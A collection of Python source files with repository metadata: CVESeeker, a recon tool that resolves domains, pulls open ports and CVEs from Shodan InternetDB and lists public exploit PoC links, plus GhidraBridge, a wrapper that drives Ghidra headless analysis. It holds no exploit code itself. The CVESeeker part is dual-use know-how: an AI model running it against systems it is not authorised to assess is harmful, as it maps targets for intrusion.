sys.exit(0) | 2,724 | Python | .py | 172 | 12.988372 | 97 | 0.639686 | Zombie-Kaiser/cve-2024-4367-PoC-fixed | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:51 PM (Europe/Amsterdam) |
2,290,106 | cveSeeker.py | anmolksachan_CVESeeker/cveSeeker.py | import socket
import requests
import os
import json
import argparse
from colorama import init, Fore, Style
# Initialize colorama
init(autoreset=True)
print(Fore.CYAN + """
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓████████▓▒░ ░▒▓███████▓▒░▒▓████████▓▒░▒▓████████▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓████████▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░ ░▒▓█▓▒░ ░▒▓█▓▒░ ░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░ ░▒▓█▓▒▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░ ░▒▓█▓▒░ ░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░ ░▒▓█▓▒▒▓█▓▒░░▒▓██████▓▒░ ░▒▓██████▓▒░░▒▓██████▓▒░ ░▒▓██████▓▒░ ░▒▓███████▓▒░░▒▓██████▓▒░ ░▒▓███████▓▒░
░▒▓█▓▒░ ░▒▓█▓▓█▓▒░ ░▒▓█▓▒░ ░▒▓█▓▒░▒▓█▓▒░ ░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▓█▓▒░ ░▒▓█▓▒░ ░▒▓█▓▒░▒▓█▓▒░ ░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░
░▒▓██████▓▒░ ░▒▓██▓▒░ ░▒▓████████▓▒░ ░▒▓███████▓▒░▒▓████████▓▒░▒▓████████▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓████████▓▒░▒▓█▓▒░░▒▓█▓▒░
Unveiling Cyber Threats: From assets to Vulnerability Insights
Coded with Love by Anmol K Sachan @FR13ND0x7F Version 2.0
""" + Style.RESET_ALL)
# Define the argument parser
parser = argparse.ArgumentParser(description="Fetch domain IPs, open ports, CVEs, and POCs")
parser.add_argument('--file', help="Input file containing domains and IPs")
parser.add_argument('--project', help="Project name for storing results")
parser.add_argument('--cve', help="CVE ID for fetching POCs")
args = parser.parse_args()
# Create output folder structure
def create_output_directory(project_name):
output_dir = os.path.join("LastScans", project_name)
os.makedirs(output_dir, exist_ok=True)
return output_dir
# Function to fetch and return POCs for a given CVE
def fetch_pocs_for_cve(cve_id):
try:
response = requests.get(f"https://poc-in-github.motikan2010.net/api/v1/?cve_id={cve_id}")
if response.status_code == 200:
return response.json().get('pocs', [])
else:
print(Fore.RED + f"[-] Failed to fetch POCs for {cve_id}")
except requests.RequestException as e:
print(Fore.RED + f"[-] Error fetching POCs: {e}")
return []
# Function to fetch POCs and print them, now including storing relevant assets
def fetch_pocs_and_print(ip, hostnames, cve_info):
found_cve_count = 0
total_cve_count = len(cve_info)
for cve in cve_info:
pocs = fetch_pocs_for_cve(cve)
if pocs:
found_cve_count += 1
print(Fore.CYAN + f"[+] Found POC for {cve}")
print(Fore.YELLOW + " [+] Links:")
for poc in pocs:
print(Fore.YELLOW + f" - {poc['html_url']}")
if cve not in cve_data:
cve_data[cve] = {'assets': [], 'pocs': []}
cve_data[cve]['assets'].append(ip)
cve_data[cve]['pocs'].extend([poc['html_url'] for poc in pocs])
if found_cve_count > 0:
print(Fore.YELLOW + f"[[+] Found] [{found_cve_count}/{total_cve_count}] for asset {ip}")
# Create JSON and HTML reports
def create_reports(output_dir, domain_ip_mapping, alive_domains, not_reachable_domains, cve_data, open_ports_mapping):
# JSON output
output_json = {
"alive_assets": {domain: {"ip": ip, "open_ports": open_ports_mapping[domain]} for domain, ip in domain_ip_mapping.items() if domain in alive_domains},
"dead_assets": {domain: None for domain in not_reachable_domains},
"cve_data": {}
}
for cve, data in cve_data.items():
output_json['cve_data'][cve] = {
'assets': data['assets'],
'pocs': data['pocs']
}
json_file_path = os.path.join(output_dir, "report.json")
with open(json_file_path, 'w') as json_file:
json.dump(output_json, json_file, indent=4)
# HTML output
html_content = f"""
<html>
<head>
<title>Scan Report</title>
<style>
body {{
font-family: Arial, sans-serif;
margin: 20px;
background-color: #f4f4f4;
color: #333;
}}
h2 {{
color: #0056b3;
}}
input[type="text"] {{
width: 300px;
padding: 10px;
margin-bottom: 20px;
border: 1px solid #ccc;
border-radius: 4px;
}}
table {{
border-collapse: collapse;
width: 100%;
margin-bottom: 20px;
background-color: #fff;
box-shadow: 0 2px 5px rgba(0, 0, 0, 0.1);
}}
th, td {{
border: 1px solid #dddddd;
text-align: left;
padding: 12px;
}}
th {{
background-color: #007bff;
color: white;
}}
tr:nth-child(even) {{
background-color: #f2f2f2;
}}
tr:hover {{
background-color: #e9ecef;
}}
</style>
<script>
function search() {{
var input = document.getElementById("search").value.toLowerCase();
var rows = document.querySelectorAll("table tr");
rows.forEach(row => {{
if (row.textContent.toLowerCase().includes(input)) {{
row.style.display = "";
}} else {{
row.style.display = "none";
}}
}});
}}
</script>
</head>
<body>
<h2>Scan Report</h2>
<input type="text" id="search" onkeyup="search()" placeholder="Search Report...">
<h3>Statistics</h3>
<table>
<tr><th>Statistic</th><th>Value</th></tr>
<tr><td>Domains Found</td><td>{len(domain_ip_mapping)}</td></tr>
<tr><td>IP Found</td><td>{total_ips}</td></tr>
<tr><td>Alive Domains</td><td>{len(alive_domains)}</td></tr>
<tr><td>Not Reachable</td><td>{len(not_reachable_domains)}</td></tr>
<tr><td>Total IP</td><td>{total_ips}</td></tr>
<tr><td>Duplicates</td><td>{duplicates}</td></tr>
<tr><td>Unique IPs</td><td>{unique_ip_count}</td></tr>
</table>
<h3>CVE Data</h3>
<table>
<tr><th>CVE</th><th>Assets</th><th>POCs</th></tr>
{''.join([
f'<tr><td>{cve}</td><td>{", ".join(data["assets"])}</td><td>{", ".join(data["pocs"])}</td></tr>'
for cve, data in output_json['cve_data'].items()
])}
</table>
<h3>Alive Assets</h3>
<table>
<tr><th>Domain</th><th>IP</th><th>Open Ports</th></tr>
{''.join([f'<tr><td>{domain}</td><td>{ip_info["ip"]}</td><td>{", ".join(map(str, ip_info["open_ports"]))}</td></tr>' for domain, ip_info in output_json['alive_assets'].items()])}
</table>
<h3>Dead Assets</h3>
<table>
<tr><th>Domain</th><th>Status</th></tr>
{''.join([f'<tr><td>{domain}</td><td>Not Reachable</td></tr>' for domain in output_json['dead_assets']])}
</table>
<h3>Scope Details</h3>
<table>
<tr><th>Scope</th></tr>
"""
# Read the input file directly to include in the HTML
if input_file:
try:
with open(input_file, 'r') as f:
scope_lines = f.readlines()
for scope in scope_lines:
html_content += f'<tr><td>{scope.strip()}</td></tr>'
except FileNotFoundError:
print(f"[-] The file {input_file} does not exist.")
html_content += '<tr><td colspan="1">Scope file not found.</td></tr>' # Provide feedback in the report
html_content += """
</table>
</body>
</html>
"""
html_file_path = os.path.join(output_dir, "report.html")
with open(html_file_path, 'w') as html_file:
html_file.write(html_content)
# Main execution
if args.cve:
pocs = fetch_pocs_for_cve(args.cve)
if pocs:
for poc in pocs:
print(Fore.CYAN + f" {poc['html_url']}")
elif args.file and args.project:
input_file = args.file
project_name = args.project
output_dir = create_output_directory(project_name)
# Initialize counters and storage
domains = set()
ips = set()
alive_domains = set()
not_reachable_domains = set()
domain_ip_mapping = {}
open_ports_mapping = {}
unique_ips = set()
global cve_data
cve_data = {} # Initialize global cve_data
# Read input file
try:
with open(input_file, 'r') as file:
lines = file.readlines()
for line in lines:
item = line.strip()
if item:
if item.replace('.', '').isdigit(): # Basic check for IP
ips.add(item)
else:
domains.add(item)
print(Fore.YELLOW + f"-------------Stats-------------")
print(Fore.GREEN + f"[+] Domains Found: {len(domains)}")
print(Fore.GREEN + f"[+] IP Found: {len(ips)}")
# Resolve domains to IPs
for domain in domains:
try:
ip = socket.gethostbyname(domain)
domain_ip_mapping[domain] = ip
alive_domains.add(domain)
unique_ips.add(ip)
open_ports_mapping[domain] = [] # Initialize open ports for the domain
except socket.error:
not_reachable_domains.add(domain)
# Logging results
print(Fore.GREEN + f"[+] Alive domains: {len(alive_domains)}")
print(Fore.RED + f"[+] Not reachable: {len(not_reachable_domains)}")
# Combine user-provided IPs and resolved IPs, removing duplicates
all_ips = ips.union(unique_ips)
total_ips = len(all_ips)
duplicates = len(ips) + len(unique_ips) - total_ips
unique_ip_count = len(all_ips)
print(Fore.GREEN + f"[+] Total IP: {total_ips}")
print(Fore.YELLOW + f"[+] Duplicates: {duplicates}")
print(Fore.GREEN + f"[+] Unique: {unique_ip_count}")
print(Fore.YELLOW + f"-------------------------------")
# Fetch CVEs for each IP
#print(Fore.YELLOW + "\n[+] Looking for CVEs")
for ip in all_ips:
try:
response = requests.get(f"https://internetdb.shodan.io/{ip}")
if response.status_code == 200:
data = response.json()
open_ports = data.get('ports', [])
cve_info = data.get('vulns', [])
hostnames = data.get('hostnames', [])
hostname_str = f"({'/'.join(hostnames)})" if hostnames else ''
if open_ports:
print(Fore.GREEN + f"[+] {ip}{hostname_str} (Open Ports): {', '.join(map(str, open_ports))}")
# Update open ports mapping
for domain in domain_ip_mapping:
if domain_ip_mapping[domain] == ip:
open_ports_mapping[domain] = open_ports
if cve_info:
print(Fore.RED + f"[+] {ip}{hostname_str} (Vulnerabilities): {', '.join(cve_info)}")
fetch_pocs_and_print(ip, hostnames, cve_info)
else:
print(Fore.YELLOW + f"[+] {ip}{hostname_str} (No Vulnerabilities found)")
else:
print(Fore.RED + f"[-] Failed to fetch data for {ip} with status code: {response.status_code}")
except requests.RequestException as e:
print(Fore.RED + f"[-] Error fetching data for {ip}: {e}")
# Create JSON and HTML reports
create_reports(output_dir, domain_ip_mapping, alive_domains, not_reachable_domains, cve_data, open_ports_mapping)
except FileNotFoundError:
print(Fore.RED + f"[-] Input file not found: {input_file}")
except Exception as e:
print(Fore.RED + f"[-] An error occurred: {e}")
else:
parser.print_help()
| 13,971 | Python | .py | 278 | 33.507194 | 217 | 0.487869 | anmolksachan/CVESeeker | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:51 PM (Europe/Amsterdam) |
2,290,107 | setup.py | user1342_GhidraBridge/setup.py | from setuptools import setup, find_packages
setup(
name="ghidrabridge",
version="0.1.11",
author="James Stevenson",
author_email="[email protected]",
description="A Python interface for automating Ghidra tasks.",
long_description_content_type="text/markdown",
url="https://github.com/user1342/GhidraBridge",
packages=find_packages(),
install_requires=[
"tqdm",
],
python_requires='>=3.6',
)
| 455 | Python | .py | 15 | 25.8 | 66 | 0.699317 | user1342/GhidraBridge | 8 | 5 | 0 | GPL-3.0 | 9/5/2024, 10:48:51 PM (Europe/Amsterdam) |
2,290,108 | test.py | user1342_GhidraBridge/test.py | from ghidrabridge.ghidra_bridge import GhidraBridge
bridge = GhidraBridge()
#
print(bridge.get_list_of_reachable_functions(r"C:\Users\james\Downloads\linux-static-binaries-master\linux-static-binaries-master\armv8-aarch64 - Copy\pure-authd","FUN_004002c8"))
| 259 | Python | .py | 4 | 63.5 | 179 | 0.822835 | user1342/GhidraBridge | 8 | 5 | 0 | GPL-3.0 | 9/5/2024, 10:48:51 PM (Europe/Amsterdam) |
2,290,109 | ghidra_bridge.py | user1342_GhidraBridge/ghidrabridge/ghidra_bridge.py | import concurrent
import hashlib
import shutil
import subprocess
import tempfile
from concurrent.futures import ProcessPoolExecutor
from pathlib import Path
from tqdm import tqdm
import re
class GhidraBridge():
def __init__(self, ghidra_project_dir=None, cspec=None, processor=None):
self.ghidra_project_dir = ghidra_project_dir
self.cspec = cspec
self.processor = processor
def brute_force_processor(self, binary):
list_of_processors = self.list_all_possible_processors()
valid_processors = []
for processor in list_of_processors:
bridge = GhidraBridge(processor=processor)
functions = bridge.get_all_function_names_and_addresses(binary)
if functions != {}:
valid_processors.append(processor)
return valid_processors
def list_all_possible_processors(self):
return ['6502:LE:16:default',
'65C02:LE:16:default',
'68000:BE:32:default',
'68000:BE:32:MC68030',
'68000:BE:32:MC68020',
'68000:BE:32:Coldfire',
'8048:LE:16:default',
'8051:BE:16:default',
'80251:BE:24:default',
'80390:BE:24:default',
'8051:BE:24:mx51',
'8085:LE:16:default',
'AARCH64:LE:64:v8A',
'AARCH64:BE:64:v8A',
'AARCH64:LE:32:ilp32',
'AARCH64:BE:32:ilp32',
'AARCH64:LE:64:AppleSilicon',
'ARM:LE:32:v8',
'ARM:LE:32:v8T',
'ARM:LEBE:32:v8LEInstruction',
'ARM:BE:32:v8',
'ARM:BE:32:v8T',
'ARM:LE:32:v7',
'ARM:LEBE:32:v7LEInstruction',
'ARM:BE:32:v7',
'ARM:LE:32:Cortex',
'ARM:BE:32:Cortex',
'ARM:LE:32:v6',
'ARM:BE:32:v6',
'ARM:LE:32:v5t',
'ARM:BE:32:v5t',
'ARM:LE:32:v5',
'ARM:BE:32:v5',
'ARM:LE:32:v4t',
'ARM:BE:32:v4t',
'ARM:LE:32:v4',
'ARM:BE:32:v4',
'avr32:BE:32:default',
'avr8:LE:16:default',
'avr8:LE:16:extended',
'avr8:LE:16:atmega256',
'avr8:LE:24:xmega',
'CP1600:BE:16:default',
'CR16C:LE:16:default',
'Dalvik:LE:32:default',
'Dalvik:LE:32:DEX_Base',
'Dalvik:LE:32:DEX_KitKat',
'Dalvik:LE:32:ODEX_KitKat',
'Dalvik:LE:32:DEX_Lollipop',
'Dalvik:LE:32:Marshmallow',
'Dalvik:LE:32:DEX_Nougat',
'Dalvik:LE:32:DEX_Oreo',
'Dalvik:LE:32:DEX_Pie',
'Dalvik:LE:32:DEX_Android10',
'Dalvik:LE:32:DEX_Android11',
'Dalvik:LE:32:DEX_Android12',
'Dalvik:LE:32:DEX_Android13',
'DATA:LE:64:default',
'DATA:BE:64:default',
'HC05:BE:16:default',
'HC05:BE:16:M68HC05TB',
'HC08:BE:16:default',
'HC08:BE:16:MC68HC908QY4',
'HCS08:BE:16:default',
'HCS08:BE:16:MC9S08GB60',
'HC-12:BE:16:default',
'HCS-12:BE:24:default',
'HCS-12X:BE:24:default',
'HCS12:BE:24:default',
'JVM:BE:32:default',
'M8C:BE:16:default',
'6809:BE:16:default',
'H6309:BE:16:default',
'6805:BE:16:default',
'MCS96:LE:16:default',
'MIPS:BE:32:default',
'MIPS:LE:32:default',
'MIPS:BE:32:R6',
'MIPS:LE:32:R6',
'MIPS:BE:64:default',
'MIPS:LE:64:default',
'MIPS:BE:64:micro',
'MIPS:LE:64:micro',
'MIPS:BE:64:R6',
'MIPS:LE:64:R6',
'MIPS:BE:64:64-32addr',
'MIPS:LE:64:64-32addr',
'MIPS:LE:64:micro64-32addr',
'MIPS:BE:64:micro64-32addr',
'MIPS:BE:64:64-32R6addr',
'MIPS:LE:64:64-32R6addr',
'MIPS:BE:32:micro',
'MIPS:LE:32:micro',
'pa-risc:BE:32:default',
'PIC-12:LE:16:PIC-12C5xx',
'PIC-16:LE:16:PIC-16',
'PIC-16:LE:16:PIC-16F',
'PIC-16:LE:16:PIC-16C5x',
'PIC-17:LE:16:PIC-17C7xx',
'PIC-18:LE:24:PIC-18',
'PIC-24E:LE:24:default',
'PIC-24F:LE:24:default',
'PIC-24H:LE:24:default',
'dsPIC30F:LE:24:default',
'dsPIC33F:LE:24:default',
'dsPIC33E:LE:24:default',
'dsPIC33C:LE:24:default',
'PowerPC:BE:32:default',
'PowerPC:LE:32:default',
'PowerPC:BE:64:default',
'PowerPC:BE:64:64-32addr',
'PowerPC:LE:64:64-32addr',
'PowerPC:LE:64:default',
'PowerPC:BE:32:4xx',
'PowerPC:LE:32:4xx',
'PowerPC:BE:32:MPC8270',
'PowerPC:BE:32:QUICC',
'PowerPC:LE:32:QUICC',
'PowerPC:BE:32:e500',
'PowerPC:LE:32:e500',
'PowerPC:BE:64:A2-32addr',
'PowerPC:LE:64:A2-32addr',
'PowerPC:BE:64:A2ALT-32addr',
'PowerPC:LE:64:A2ALT-32addr',
'PowerPC:BE:64:A2ALT',
'PowerPC:LE:64:A2ALT',
'PowerPC:BE:64:VLE-32addr',
'PowerPC:BE:64:VLEALT-32addr',
'RISCV:LE:64:RV64I',
'RISCV:LE:64:RV64IC',
'RISCV:LE:64:RV64G',
'RISCV:LE:64:RV64GC',
'RISCV:LE:64:default',
'RISCV:LE:32:RV32I',
'RISCV:LE:32:RV32IC',
'RISCV:LE:32:RV32IMC',
'RISCV:LE:32:RV32G',
'RISCV:LE:32:RV32GC',
'RISCV:LE:32:default',
'sparc:BE:32:default',
'sparc:BE:64:default',
'SuperH:BE:32:SH-2A',
'SuperH:BE:32:SH-2',
'SuperH:BE:32:SH-1',
'SuperH4:BE:32:default',
'SuperH4:LE:32:default',
'TI_MSP430:LE:16:default',
'TI_MSP430X:LE:32:default',
'tricore:LE:32:default',
'tricore:LE:32:tc29x',
'tricore:LE:32:tc172x',
'tricore:LE:32:tc176x',
'V850:LE:32:default',
'x86:LE:32:default',
'x86:LE:32:System Management Mode',
'x86:LE:16:Real Mode',
'x86:LE:16:Protected Mode',
'x86:LE:64:default',
'z80:LE:16:default',
'z8401x:LE:16:default',
'z180:LE:16:default',
'z182:LE:16:default']
def _execute_blocking_command(self, command_as_list):
if command_as_list != None:
#print("Executing command: {}".format(command_as_list))
result = subprocess.run(command_as_list, capture_output=False, stdout=subprocess.PIPE,stderr=subprocess.PIPE)
return result
def generate_script_for_getting_registers_for_function(self, target_function):
script = """from ghidra.app.emulator import EmulatorHelper
from ghidra.program.model.symbol import SymbolUtilities
# Tested with Ghidra v9.1 and v9.1.1, future releases are likely to simplify
# and/or expand the EmulatorHelper class in the API.
# == Helper functions ======================================================
def getAddress(offset):
return currentProgram.getAddressFactory().getDefaultAddressSpace().getAddress(offset)
def getSymbolAddress(symbolName):
symbol = SymbolUtilities.getLabelOrFunctionSymbol(currentProgram, symbolName, None)
if (symbol != None):
return symbol.getAddress()
else:
raise("Failed to locate label: {}".format(symbolName))
def getProgramRegisterList(currentProgram):
pc = currentProgram.getProgramContext()
return pc.registers
# == Main function =========================================================
def main():
CONTROLLED_RETURN_OFFSET = 0
# Identify function to be emulated
mainFunctionEntry = getSymbolAddress("FUN_00400dd0")
# Establish emulation helper, please check out the API docs
# for `EmulatorHelper` - there's a lot of helpful things
# to help make architecture agnostic emulator tools.
emuHelper = EmulatorHelper(currentProgram)
# Set controlled return location so we can identify return from emulated function
controlledReturnAddr = getAddress(CONTROLLED_RETURN_OFFSET)
# Set initial RIP
mainFunctionEntryLong = int("0x{}".format(mainFunctionEntry), 16)
emuHelper.writeRegister(emuHelper.getPCRegister(), mainFunctionEntryLong)
# For x86_64 `registers` contains 872 registers! You probably don't
# want to print all of these. Just be aware, and print what you need.
# To see all supported registers. just print `registers`.
# We won't use this, it's just here to show you how to query
# valid registers for your target architecture.
registers = getProgramRegisterList(currentProgram)
print("registers_start")
print(registers)
print("registers_end")
# Cleanup resources and release hold on currentProgram
emuHelper.dispose()
# == Invoke main ===========================================================
main()""".replace("<function>",target_function)
return script
def generate_function_rename_script(seld, old_function_name, new_function_name):
script = """# Import the necessary Ghidra modules
from ghidra.program.model.listing import FunctionManager
from ghidra.util.exception import DuplicateNameException
from ghidra.util.exception import InvalidInputException
from ghidra.program.model.symbol import RefType, SymbolType
# Get the current program
program = getCurrentProgram()
# Get the function manager for the current program
function_manager = program.getFunctionManager()
def get_function_by_name(name):
symbol_table = currentProgram.getSymbolTable()
symbols = symbol_table.getSymbols(name)
for symbol in symbols:
if symbol.getSymbolType() == SymbolType.FUNCTION:
return getFunctionAt(symbol.getAddress())
return None
SymbolType
def rename_function(function, new_name):
try:
# Rename the function
function.setName(new_name, ghidra.program.model.symbol.SourceType.USER_DEFINED)
except DuplicateNameException as e:
print("Error: Duplicate function name - {}".format(e))
except InvalidInputException as e:
print("Error: Invalid input - {}".format(e))
except Exception as e:
print("An unexpected error occurred: {}".format(e))
# Example usage:
# Specify the address of the function you want to rename
function_address = get_function_by_name("<old_name>") # Change this to the address of your function
new_function_name = "<new_name>" # Change this to the new name you want to assign
# Rename the function
rename_function(function_address, new_function_name)""".replace("<old_name>",f"{old_function_name}").replace("<new_name>",f"{new_function_name}")
return script
def generate_control_flow_script(self, function_name):
script = """from ghidra.program.model.symbol import RefType, SymbolType
from ghidra.util.task import ConsoleTaskMonitor
from ghidra.program.model.address import Address
from ghidra.program.model.block import BasicBlockModel, CodeBlockReferenceIterator
from ghidra.program.model.pcode import PcodeOp
def get_function_by_name(name):
symbol_table = currentProgram.getSymbolTable()
symbols = symbol_table.getSymbols(name)
for symbol in symbols:
if symbol.getSymbolType() == SymbolType.FUNCTION:
return getFunctionAt(symbol.getAddress())
return None
def find_reachable_functions(function):
monitor = ConsoleTaskMonitor()
called_functions = set()
to_process = [function]
while to_process:
current_function = to_process.pop()
if current_function in called_functions:
continue
called_functions.add(current_function)
# Get the instructions in the function
listing = currentProgram.getListing()
instructions = listing.getInstructions(current_function.getBody(), True)
for instruction in instructions:
if instruction.getFlowType().isCall():
called_func = getFunctionAt(instruction.getFlows()[0])
if called_func and called_func not in called_functions:
to_process.append(called_func)
return called_functions
def main():
function_name = <name>
function = get_function_by_name(function_name)
if function is None:
print("Function "+function_name+" not found.")
return
reachable_functions = find_reachable_functions(function)
print("***")
for func in reachable_functions:
print(" "+func.getName())
print("***")
if __name__ == "__main__":
main()
""".replace("<name>",f"'{function_name}'")
return script
def generate_get_cross_references_to_function_name(self,name):
script = """fm = currentProgram.getFunctionManager()
funcs = fm.getFunctions(True)
for func in funcs:
if func.getName() == "<name>":
print("Found '<name>' @ 0x{}".format(func.getEntryPoint()))
entry_point = func.getEntryPoint()
references = getReferencesTo(entry_point)
for xref in references:
print(xref)""".replace("<name>", name)
return script
def generate_decom_for_function(self, function_name):
script = """from ghidra.app.decompiler import DecompInterface
from ghidra.util.task import ConsoleTaskMonitor
program = getCurrentProgram()
ifc = DecompInterface()
ifc.openProgram(program)
# here we assume there is only one function named `main`
function = getGlobalFunctions('<name>')[0]
# decompile the function and print the pseudo C
results = ifc.decompileFunction(function, 0, ConsoleTaskMonitor())
print(results.getDecompiledFunction().getC())""".replace("<name>", function_name)
return script
def generate_get_function_address_by_name(self, name):
script = """# Note that multiple functions can share the same name, so Ghidra's API
# returns a list of `Function` types. Just keep this in mind.
name = "<name>"
funcs = getGlobalFunctions(name)
print("Found {} function(s) with the name '{}'".format(len(funcs), name))
for func in funcs:
print("{} is located at 0x{}".format(func.getName(), func.getEntryPoint()))""".replace("<name>", name)
return script
def generate_get_function_names_and_address(self):
script = """fm = currentProgram.getFunctionManager()
funcs = fm.getFunctions(True) # True means 'forward'
for func in funcs:
print("Function: {} - Address: 0x{}".format(func.getName(), func.getEntryPoint()))"""
return script
def generate_get_a_function_name_by_address(self, address):
script = """# helper function to get a Ghidra Address type
def getAddress(offset):
return currentProgram.getAddressFactory().getDefaultAddressSpace().getAddress(offset)
# get a FunctionManager reference for the current program
functionManager = currentProgram.getFunctionManager()
# getFunctionAt() only works with function entryPoint addresses!
# returns `None` if address is not the address of the first
# instruction in a defined function. Consider using
# getFunctionContaining() method instead.
addr = getAddress(<address>)
funcName = functionManager.getFunctionAt(addr).getName()
print(funcName)""".replace("<address>",address)
return script
def generate_ghidra_decom_script(self, path_to_save_decoms_to, file_to_save_script_to):
script = """# SaveFunctions.py
# Import necessary Ghidra modules
from ghidra.program.model.listing import Function
from ghidra.util.task import TaskMonitor
from ghidra.app.decompiler import DecompInterface
import os
import time
import re
# Function to save the decompiled C code of a function to a file
def save_function_c_code(function, output_directory):
function_name = function.getName()
function_c_code = decompile_function_to_c_code(function)
# Create the output directory if it doesn't exist
if not os.path.exists(output_directory):
os.makedirs(output_directory)
# Save the C code to a file
current_epoch_time = int(time.time())
# Combine the elements to create the file path
output_file_path = os.path.join(
output_directory,
re.sub(r'[^\w\-\.\\/]', '_', "{}__{}__{}.c".format(
function.getProgram().getName(),
function_name,
int(time.time())
))
)
with open(output_file_path, 'w') as output_file:
output_file.write(function_c_code)
# Function to decompile a function to C code
def decompile_function_to_c_code(function):
decompiler = get_decompiler(function.getProgram())
result = decompiler.decompileFunction(function, 0, TaskMonitor.DUMMY)
try:
return result.getDecompiledFunction().getC()
except:
return ""
# Function to get the decompiler for the current program
def get_decompiler(program):
decompiler_options = program.getOptions("Decompiler")
decompiler_id = decompiler_options.getString("decompiler", "ghidra")
decompiler = DecompInterface()
decompiler.openProgram(program)
return decompiler
# Main function to iterate through all functions and save their C code
def save_all_functions_to_files():
current_program = getCurrentProgram()
listing = current_program.getListing()
# Specify the output directory
output_directory = r"<PATH>"
# Iterate through all functions
for function in listing.getFunctions(True):
function_name = function.getName()
save_function_c_code(function, output_directory)
# Run the main function
save_all_functions_to_files()
""".replace("<PATH>", path_to_save_decoms_to)
with open(file_to_save_script_to, "w") as file:
file.write(script)
def _check_if_ghidra_project_exists(self, project_folder, project_name):
project_folder_path = Path(project_folder, project_name + ".gpr")
return project_folder_path.exists()
def start_headless_with_script(self, path_to_binary, path_to_script):
binary_hash = self._hash_binary(path_to_binary)
with tempfile.TemporaryDirectory() as tmpdirname:
script_path = Path(tmpdirname, "decom_script.py").resolve()
self._construct_ghidra_headless_command(path_to_binary, path_to_script, binary_hash)
def _construct_ghidra_headless_command(self, binary_path, script_path, binary_hash):
binary_name = "analyzeHeadless.bat"
# Check if the binary is on the PATH
headless = shutil.which(binary_name)
temp_script_path = Path(script_path)
temp_script_dir = temp_script_path.parent
Path(temp_script_dir).resolve()
if headless is not None:
pass#print(f"{binary_name} found at: {headless}")
else:
binary_name = "analyzeHeadless"
# Check if the binary is on the PATH
headless = shutil.which(binary_name)
if headless is None:
# Binary not found, prompt user to provide the path
user_provided_path = input(f"{binary_name} not found on the PATH. Please provide the full path: ")
# Verify if the provided path is valid
if shutil.which(user_provided_path) is not None:
headless = user_provided_path
print(f"{binary_name} found at: {headless}")
headless = user_provided_path
else:
raise Exception(f"Error: {binary_name} not found at the provided path.")
tmp_dir = None
if not self.ghidra_project_dir:
tmp_dir = tempfile.TemporaryDirectory()
ghidra_project_dir = tmp_dir.name
else:
ghidra_project_dir = self.ghidra_project_dir
if self._check_if_ghidra_project_exists(ghidra_project_dir, binary_hash):
#print("Processing existing project")
commandStr = [
headless,
ghidra_project_dir,
binary_hash,
"-process",
"-scriptPath",
temp_script_dir,
"-postScript",
temp_script_path.name
]
else:
#print("Importing new project")
commandStr = [
headless,
ghidra_project_dir,
binary_hash,
"-import",
binary_path,
"-scriptPath",
temp_script_dir,
"-postScript",
temp_script_path.name
]
if self.cspec != None:
commandStr = commandStr + [
"-cspec",
self.cspec
]
if self.processor != None:
commandStr = commandStr + [
"-processor",
self.processor
]
resp = self._execute_blocking_command(commandStr)
if not ghidra_project_dir:
ghidra_project_dir.cleanup()
# Run Ghidra headless command
return resp
def _hash_binary(self, binary_path):
with open(binary_path, 'rb') as f:
binary_hash = hashlib.sha256(f.read()).hexdigest()
return binary_hash
def run_string_script_on_binary(self, string_script, path_to_binary):
binary_hash = self._hash_binary(path_to_binary)
with tempfile.TemporaryDirectory() as tmpdirname:
script_path = Path(tmpdirname, "script.py").resolve()
with open(script_path, "w") as file:
# Write some content to the file
file.write(string_script)
return self._construct_ghidra_headless_command(path_to_binary, script_path, binary_hash)
def get_all_function_names_and_addresses(self, path_to_binary):
script_contents = self.generate_get_function_names_and_address()
with tempfile.TemporaryDirectory() as tmpdirname:
script_path = Path(tmpdirname, "rename_script.py").resolve()
with open(script_path, "w") as file:
file.write(script_contents)
binary_hash = self._hash_binary(path_to_binary)
response = self._construct_ghidra_headless_command(path_to_binary, script_path, binary_hash)
# Regular expression pattern to extract function names and addresses
pattern = r'Function: (\w+) - Address: (0x[\da-f]+)'
# Using re.findall to extract all matches
matches = re.findall(pattern, str(response))
# Create a dictionary to store the results
functions_dict = {}
# Populate the dictionary with extracted data
for match in matches:
function_name, address = match
functions_dict[function_name] = address
return functions_dict
def get_registers_for_function(self, path_to_binary, function):
script_contents = self.generate_script_for_getting_registers_for_function(function)
with tempfile.TemporaryDirectory() as tmpdirname:
script_path = Path(tmpdirname, "rename_script.py").resolve()
with open(script_path, "w") as file:
file.write(script_contents)
binary_hash = self._hash_binary(path_to_binary)
response = str(self._construct_ghidra_headless_command(path_to_binary, script_path, binary_hash))
if "registers" not in response:
raise Exception("Script run uncuccessfully")
resp = response[response.find("registers_start")+len("registers_start"):response.rfind("registers")]
resp = resp.split(",")
registers = []
for register in resp:
register = register.strip("\n").strip(r"[").replace("[","").replace("]","").strip(r"]").strip("\\n").strip("'").strip().strip(" ")
registers.append(register)
return registers
def refactor_function_name(self, path_to_binary, old_function_name, new_function_name):
script_contents = self.generate_function_rename_script(old_function_name, new_function_name)
with tempfile.TemporaryDirectory() as tmpdirname:
script_path = Path(tmpdirname, "rename_script.py").resolve()
with open(script_path, "w") as file:
file.write(script_contents)
binary_hash = self._hash_binary(path_to_binary)
response = self._construct_ghidra_headless_command(path_to_binary, script_path, binary_hash)
return response
def decompile_binaries_functions(self, path_to_binary, decom_folder):
binary_hash = self._hash_binary(path_to_binary)
with tempfile.TemporaryDirectory() as tmpdirname:
script_path = Path(tmpdirname, "decom_script.py").resolve()
self.generate_ghidra_decom_script(decom_folder, script_path)
